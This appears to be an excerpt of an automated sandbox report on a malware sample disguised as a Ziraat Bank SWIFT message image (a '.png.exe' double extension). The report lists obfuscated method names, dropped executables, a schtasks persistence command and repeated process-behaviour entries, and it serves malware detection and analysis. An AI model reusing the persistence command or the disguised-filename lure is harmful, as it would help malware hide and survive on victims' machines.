Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, yNhnOOJGFxk6e3GInP.cs	High entropy of concatenated method names: 'ggEkcAowc1', 'mH4kgmuIu8', 'vmak8Q5c3S', 'jbtkFAlbPw', 'TLZkag4hYr', 'wdyk51TUoX', 'Yhokiy4QnO', 'zv7k32kiA5', 'WUnkUsmTlo', 'WftkuUtLub'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, dY2LGhMvXbvyFns3MQ.cs	High entropy of concatenated method names: 'rG9edhacOG', 's4uer28ZIt', 'LAIw6VckOv', 'jeGw9Ov03J', 'PDCevA8pAP', 'VDbeoCX2UI', 'NXSefSXnBW', 'WCdeh51gcn', 'mlueAje6eR', 'EajexHHeJn'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, u0P0bd7QowMHmsWWAW.cs	High entropy of concatenated method names: 'Dispose', 'fVX9JQBNQS', 'ek1lgedA21', 'PxAdgy7qqo', 'ovE9rT8G63', 'tm59ztTEPF', 'ProcessDialogKey', 'JLOl6NhnOO', 'pFxl9k6e3G', 'onPllCiQJ5'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, emfDZb90oVCoqQoNf4Z.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XKZXkEqRDd', 'AJMXDlJsNv', 'F4eXnKcNd4', 'T2vXXedYFc', 'xlLXBknRHJ', 'b23XZHLJDZ', 'z59X2w5bqm'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, TiQJ5prpdlgEbqy6Y4.cs	High entropy of concatenated method names: 'gXqDSTbZbR', 'IwCDTk5skI', 'AKADt4vSgc', 'xFYD10OCAH', 'NS7DkTfEcL', 'mg3DqcltA5', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, CwrCpGg1VN6tJneS98.cs	High entropy of concatenated method names: 'KMmb2ldmE0pN1bpQinS', 'oNsMD3dYkxXFf0bfMJc', 'IjBtwKwvbe', 'hc7tk0naqq', 'HHttDNveCE', 'yoiiAadlTChrgRPWNnx', 'g8ulgVdtExLsbTRTGrS'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, bscPwAfTBwqKqpklra.cs	High entropy of concatenated method names: 'qohIprSaH9', 'YHTIECqhcp', 'VmNIc92ag9', 'fOnIgbhMri', 'MwtIFnavod', 'kuDIaJO6OE', 'fJSIiISidt', 'oomI3YBPRm', 'JVfIug9lD1', 'ex4IvMwx2W'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, vbRJpmhwHtX87mtI44.cs	High entropy of concatenated method names: 'rQAVuLi508', 'qSPVoUp3H8', 'OxdVhEXTQV', 'y5gVAX4gvm', 'Oa2VgLDsi8', 'VJ3V8HISjZ', 'fBVVF4gov3', 'NHpVa5w117', 'RPvV5KSvg7', 'J9vVif6HYt'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, mryXXj96Mu79U8ftsLf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PxHDvcnCOW', 'jdgDoIhWbg', 'EmtDffQG3T', 'xeMDhEcJxg', 'hgQDAlJvqN', 'Le5DxLSlZb', 'DQnDCVgguR'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, Ji6lWDSU5hSVGJ1JhX.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'EqIlJUOp9U', 'BIFlrxU6Bg', 'SgQlzgEbrB', 'HxmR6Py5Nf', 'trbR9u6dwj', 'otPRl3sLuJ', 'xyRRRh0pVp', 'MqB8l7xdjlW8aB2eUny'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, pxZIZVCN5JsAiqQYlw.cs	High entropy of concatenated method names: 'aCFePIVw6x', 'lCAej7u3Nb', 'ToString', 'Dkcey4t9ZX', 'hUYe7LNFWo', 'ue4eSFAZCm', 'udjeTnb7F6', 'JpxetuWu78', 'NmUe1t68Fp', 'Vfheqge2DO'
Source: 0.2.Ziraat_Bankasi_Swift_Messaji.png.exe.3d8c0e0.2.raw.unpack, mowLncLktyVXQBNQSI.cs	High entropy of concatenated method names: 'CDvkVcx6aQ', 'E7Ske4a69g', 'AegkkKwZTM', 'iuiknyBeB2', 'oJLkBIN7B0', 'Qofk2N0FHn', 'Dispose', 'sECwycISjn', 'lNiw7whWIM', 'PbnwSLjMM8'
Source: 9.3.Native_New-Nova.exe.5993e8.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.Native_New-Nova.exe.4b10000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 9.2.Native_New-Nova.exe.23e0f08.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs	High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'GDRjaSXF49wau', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	File created: C:\Users\user\AppData\Local\Temp\Native_snake01.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	File created: C:\Users\user\AppData\Local\Temp\Native_New-Nova.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	File created: C:\Users\user\AppData\Roaming\BZTCUCKTKd.exe	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BZTCUCKTKd" /XML "C:\Users\user\AppData\Local\Temp\tmp9D7B.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Uses an obfuscated file name to hide its real file extension (double extension)

Source: Possible double extension: png.exe

Static PE information: Ziraat_Bankasi_Swift_Messaji.png.exe

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Messaji.png.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
